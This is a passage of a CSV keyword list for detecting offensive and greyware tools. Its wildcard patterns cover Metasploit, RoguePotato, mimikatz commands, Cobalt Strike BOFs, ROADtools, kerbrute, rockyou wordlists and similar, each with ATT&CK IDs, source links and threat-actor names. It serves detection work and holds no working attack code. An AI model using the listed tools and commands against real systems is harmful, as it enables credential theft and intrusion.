and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*rmmod -r*,greyware_tool_keyword,rmmod,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*rmmod --remove*,greyware_tool_keyword,rmmod,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*roadrecon plugin *,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,0,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*roadrecon*gather.py*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,0,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*roadrecon.db*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*roadrecon/frontend*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*ROADtools.git*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation 
tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*ROADtools-master*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*roastinthemiddle -i * -t * -u *.txt -g *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*robertdavidgraham/masscan*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,1,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*RobustPentestMacro*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*ROCAVulnerabilityTester*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf 
https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*rockyou.txt.gz*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*rockyou.txt.gz*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rockyou-30000.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*RogueOxidResolver.cpp*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato.cpp*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato.exe*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato.sln*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege 
Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato.zip*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RoguePotato-master*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*RogueSploit*,offensive_tool_keyword,RogueSploit,RogueSploit is an open source automated script made to create a Fake Acces Point. with dhcpd server. dns spoofing. host redirection. browser_autopwn1 or autopwn2 or beef+mitmf,T1534 - T1565 - T1566 - T1573 - T1590,TA0001 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/h0nus/RogueSploit,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*RogueWinRM dll.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RogueWinRM exe.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RogueWinRM.c*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*rookuu/BOFs/*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*Root backdoor obtained!*,offensive_tool_keyword,POC,This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 
and CVE-2022-29800),T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/Immersive-Labs-Sec/nimbuspwn,1,0,N/A,N/A,1,21,5,2022-05-05T10:02:27Z,2022-04-27T13:04:33Z -*root/SecurityCenter2* -ClassName AntiVirusProduct*,greyware_tool_keyword,powershell,list AV products with powershell,T1518.001 - T1082,TA0007 - TA0005,N/A,N/A,Discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*root\cimv2:Win32_Implant*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*root_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Rootkit.cpp*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,1,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*Rootkit.Win64.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword for ransomware,T1486 - T1489 - T1490 - T1485 - T1487 - T1491 - T1492 - T1488 - T1493 - T1497,TA0007 - TA0003 - TA0002 - TA0004 - TA0006 - TA0010,N/A,N/A,Ransomware,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*root-shellcode-linux*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*rop.find_gadgets*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*RopChain.py*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*ROPEngine.cpp*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ropfuscator *,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,0,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ROPfuscator*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - 
TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ropfuscator-*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ropfuscator.*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*ropnop/go-windapsearch*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ropnop/kerbrute*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*rottenpotato.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*rottenpotato.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RottenPotatoVulnerable.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*routerpasswords.com/*,offensive_tool_keyword,routerpasswords.com,find default routers passwords,T1110.003 - T1200,TA0001 - TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,1,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*routers_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RouterScan.exe*,greyware_tool_keyword,routerscan,Router Scan is able to find and identify a variety of devices from large number of known routers on your internal network,T1046 - T1083 - T1018 - T1116,TA0007 - TA0010 - TA0003,N/A,N/A,Network Exploitation tools,https://en.kali.tools/?p=244,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*routersploit*,offensive_tool_keyword,routersploit,The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits,T1210.001 - T1190 - T1213 - T1189,TA0007 - TA0002 - TA0001 - TA0011,N/A,N/A,Frameworks,https://github.com/threat9/routersploit,1,1,N/A,N/A,10,11408,2303,2023-05-22T21:50:32Z,2016-03-30T11:43:12Z -*rpc://* -rpc-mode ICPR -icpr-ca-name *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*rpc::close*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*rpc::connect*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*rpc::enum*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*rpc::server*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*rpcattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*rpcattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rpc-backdoor.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 